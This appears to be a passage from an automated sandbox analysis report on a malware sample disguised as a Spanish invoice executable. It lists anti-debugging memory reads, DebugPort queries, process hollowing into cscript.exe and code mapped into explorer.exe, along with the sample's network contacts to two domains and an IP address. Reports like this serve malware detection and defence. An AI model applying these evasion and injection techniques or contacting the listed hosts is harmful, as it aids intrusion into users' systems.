            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169FEC0 mov eax, dword ptr fs:[00000030h]6_2_0169FEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016136CC mov eax, dword ptr fs:[00000030h]6_2_016136CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8ED6 mov eax, dword ptr fs:[00000030h]6_2_016B8ED6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F76E2 mov eax, dword ptr fs:[00000030h]6_2_015F76E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016646A7 mov eax, dword ptr fs:[00000030h]6_2_016646A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]6_2_016B0EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]6_2_016B0EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B0EA5 mov eax, dword ptr fs:[00000030h]6_2_016B0EA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167FE87 mov eax, dword ptr fs:[00000030h]6_2_0167FE87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863884 mov eax, dword ptr fs:[00000030h]10_2_04863884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863884 mov eax, dword ptr fs:[00000030h]10_2_04863884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048290AF mov eax, dword ptr fs:[00000030h]10_2_048290AF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov ecx, dword ptr fs:[00000030h]10_2_0481F0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov eax, dword ptr fs:[00000030h]10_2_0481F0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481F0BF mov eax, dword ptr fs:[00000030h]10_2_0481F0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]10_2_047FB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]10_2_047FB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]10_2_047FB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB02A mov eax, dword ptr fs:[00000030h]10_2_047FB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]10_2_0487B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0487B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]10_2_0487B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]10_2_0487B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]10_2_0487B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487B8D0 mov eax, dword ptr fs:[00000030h]10_2_0487B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8CD6 mov eax, dword ptr fs:[00000030h]10_2_048B8CD6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A14FB mov eax, dword ptr fs:[00000030h]10_2_048A14FB
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]10_2_04866CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]10_2_04866CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866CF0 mov eax, dword ptr fs:[00000030h]10_2_04866CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]10_2_048B740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]10_2_048B740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B740D mov eax, dword ptr fs:[00000030h]10_2_048B740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A1C06 mov eax, dword ptr fs:[00000030h]10_2_048A1C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]10_2_04866C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]10_2_04866C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]10_2_04866C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04866C0A mov eax, dword ptr fs:[00000030h]10_2_04866C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]10_2_04867016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]10_2_04867016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867016 mov eax, dword ptr fs:[00000030h]10_2_04867016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B4015 mov eax, dword ptr fs:[00000030h]10_2_048B4015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B4015 mov eax, dword ptr fs:[00000030h]10_2_048B4015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481BC2C mov eax, dword ptr fs:[00000030h]10_2_0481BC2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A44B mov eax, dword ptr fs:[00000030h]10_2_0481A44B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800050 mov eax, dword ptr fs:[00000030h]10_2_04800050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800050 mov eax, dword ptr fs:[00000030h]10_2_04800050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487C450 mov eax, dword ptr fs:[00000030h]10_2_0487C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487C450 mov eax, dword ptr fs:[00000030h]10_2_0487C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F849B mov eax, dword ptr fs:[00000030h]10_2_047F849B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480746D mov eax, dword ptr fs:[00000030h]10_2_0480746D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A2073 mov eax, dword ptr fs:[00000030h]10_2_048A2073
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9080 mov eax, dword ptr fs:[00000030h]10_2_047E9080
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B1074 mov eax, dword ptr fs:[00000030h]10_2_048B1074
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C182 mov eax, dword ptr fs:[00000030h]10_2_0480C182
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A185 mov eax, dword ptr fs:[00000030h]10_2_0481A185
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB171 mov eax, dword ptr fs:[00000030h]10_2_047EB171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB171 mov eax, dword ptr fs:[00000030h]10_2_047EB171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FD9B mov eax, dword ptr fs:[00000030h]10_2_0481FD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FD9B mov eax, dword ptr fs:[00000030h]10_2_0481FD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC962 mov eax, dword ptr fs:[00000030h]10_2_047EC962
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048135A1 mov eax, dword ptr fs:[00000030h]10_2_048135A1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048161A0 mov eax, dword ptr fs:[00000030h]10_2_048161A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048161A0 mov eax, dword ptr fs:[00000030h]10_2_048161A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]10_2_04811DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]10_2_04811DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04811DB5 mov eax, dword ptr fs:[00000030h]10_2_04811DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F3D34 mov eax, dword ptr fs:[00000030h]10_2_047F3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EAD30 mov eax, dword ptr fs:[00000030h]10_2_047EAD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048741E8 mov eax, dword ptr fs:[00000030h]10_2_048741E8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04898DF1 mov eax, dword ptr fs:[00000030h]10_2_04898DF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]10_2_047E9100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]10_2_047E9100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9100 mov eax, dword ptr fs:[00000030h]10_2_047E9100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]10_2_047EB1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]10_2_047EB1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB1E1 mov eax, dword ptr fs:[00000030h]10_2_047EB1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0 mov eax, dword ptr fs:[00000030h]10_2_047FD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E0 mov eax, dword ptr fs:[00000030h]10_2_047FD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov eax, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04804120 mov ecx, dword ptr fs:[00000030h]10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0486A537 mov eax, dword ptr fs:[00000030h]10_2_0486A537
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]10_2_04814D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]10_2_04814D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04814D3B mov eax, dword ptr fs:[00000030h]10_2_04814D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481513A mov eax, dword ptr fs:[00000030h]10_2_0481513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481513A mov eax, dword ptr fs:[00000030h]10_2_0481513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8D34 mov eax, dword ptr fs:[00000030h]10_2_048B8D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04823D43 mov eax, dword ptr fs:[00000030h]10_2_04823D43
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480B944 mov eax, dword ptr fs:[00000030h]10_2_0480B944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480B944 mov eax, dword ptr fs:[00000030h]10_2_0480B944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04863540 mov eax, dword ptr fs:[00000030h]10_2_04863540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04807D50 mov eax, dword ptr fs:[00000030h]10_2_04807D50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E2D8A mov eax, dword ptr fs:[00000030h]10_2_047E2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C577 mov eax, dword ptr fs:[00000030h]10_2_0480C577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480C577 mov eax, dword ptr fs:[00000030h]10_2_0480C577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FE87 mov eax, dword ptr fs:[00000030h]10_2_0487FE87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F766D mov eax, dword ptr fs:[00000030h]10_2_047F766D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481D294 mov eax, dword ptr fs:[00000030h]10_2_0481D294
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481D294 mov eax, dword ptr fs:[00000030h]10_2_0481D294
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048646A7 mov eax, dword ptr fs:[00000030h]10_2_048646A7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]10_2_048B0EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]10_2_048B0EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B0EA5 mov eax, dword ptr fs:[00000030h]10_2_048B0EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481FAB0 mov eax, dword ptr fs:[00000030h]10_2_0481FAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]10_2_047E9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]10_2_047E9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]10_2_047E9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E9240 mov eax, dword ptr fs:[00000030h]10_2_047E9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F7E41 mov eax, dword ptr fs:[00000030h]10_2_047F7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04828EC7 mov eax, dword ptr fs:[00000030h]10_2_04828EC7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489FEC0 mov eax, dword ptr fs:[00000030h]10_2_0489FEC0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048136CC mov eax, dword ptr fs:[00000030h]10_2_048136CC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8ED6 mov eax, dword ptr fs:[00000030h]10_2_048B8ED6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EE620 mov eax, dword ptr fs:[00000030h]10_2_047EE620
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048116E0 mov ecx, dword ptr fs:[00000030h]10_2_048116E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F8A0A mov eax, dword ptr fs:[00000030h]10_2_047F8A0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]10_2_047EC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]10_2_047EC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EC600 mov eax, dword ptr fs:[00000030h]10_2_047EC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04803A1C mov eax, dword ptr fs:[00000030h]10_2_04803A1C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F76E2 mov eax, dword ptr fs:[00000030h]10_2_047F76E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A61C mov eax, dword ptr fs:[00000030h]10_2_0481A61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A61C mov eax, dword ptr fs:[00000030h]10_2_0481A61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489FE3F mov eax, dword ptr fs:[00000030h]10_2_0489FE3F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAAB0 mov eax, dword ptr fs:[00000030h]10_2_047FAAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAAB0 mov eax, dword ptr fs:[00000030h]10_2_047FAAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04874257 mov eax, dword ptr fs:[00000030h]10_2_04874257
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E52A5 mov eax, dword ptr fs:[00000030h]10_2_047E52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489B260 mov eax, dword ptr fs:[00000030h]10_2_0489B260
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489B260 mov eax, dword ptr fs:[00000030h]10_2_0489B260
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8A62 mov eax, dword ptr fs:[00000030h]10_2_048B8A62
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480AE73 mov eax, dword ptr fs:[00000030h]10_2_0480AE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482927A mov eax, dword ptr fs:[00000030h]10_2_0482927A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A138A mov eax, dword ptr fs:[00000030h]10_2_048A138A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0489D380 mov ecx, dword ptr fs:[00000030h]10_2_0489D380
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481B390 mov eax, dword ptr fs:[00000030h]10_2_0481B390
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]10_2_04867794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]10_2_04867794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04867794 mov eax, dword ptr fs:[00000030h]10_2_04867794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EDB60 mov ecx, dword ptr fs:[00000030h]10_2_047EDB60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFF60 mov eax, dword ptr fs:[00000030h]10_2_047FFF60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EF358 mov eax, dword ptr fs:[00000030h]10_2_047EF358
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B5BA5 mov eax, dword ptr fs:[00000030h]10_2_048B5BA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EDB40 mov eax, dword ptr fs:[00000030h]10_2_047EDB40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FEF40 mov eax, dword ptr fs:[00000030h]10_2_047FEF40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E4F2E mov eax, dword ptr fs:[00000030h]10_2_047E4F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E4F2E mov eax, dword ptr fs:[00000030h]10_2_047E4F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048237F5 mov eax, dword ptr fs:[00000030h]10_2_048237F5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B070D mov eax, dword ptr fs:[00000030h]10_2_048B070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B070D mov eax, dword ptr fs:[00000030h]10_2_048B070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A70E mov eax, dword ptr fs:[00000030h]10_2_0481A70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481A70E mov eax, dword ptr fs:[00000030h]10_2_0481A70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A131B mov eax, dword ptr fs:[00000030h]10_2_048A131B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480F716 mov eax, dword ptr fs:[00000030h]10_2_0480F716
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FF10 mov eax, dword ptr fs:[00000030h]10_2_0487FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0487FF10 mov eax, dword ptr fs:[00000030h]10_2_0487FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481E730 mov eax, dword ptr fs:[00000030h]10_2_0481E730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8B58 mov eax, dword ptr fs:[00000030h]10_2_048B8B58
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B8F6A mov eax, dword ptr fs:[00000030h]10_2_048B8F6A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F8794 mov eax, dword ptr fs:[00000030h]10_2_047F8794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1B8F mov eax, dword ptr fs:[00000030h]10_2_047F1B8F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1B8F mov eax, dword ptr fs:[00000030h]10_2_047F1B8F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04813B7A mov eax, dword ptr fs:[00000030h]10_2_04813B7A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04813B7A mov eax, dword ptr fs:[00000030h]10_2_04813B7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040ACF0 LdrLoadDll,6_2_0040ACF0
            Source: C:\Users\user\Desktop\Factura de proforma.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.aminobalm.com
            Source: C:\Windows\explorer.exeDomain query: www.palmonlae.space
            Source: C:\Windows\explorer.exeNetwork Connect: 13.209.99.177 80Jump to behavior
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 260000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
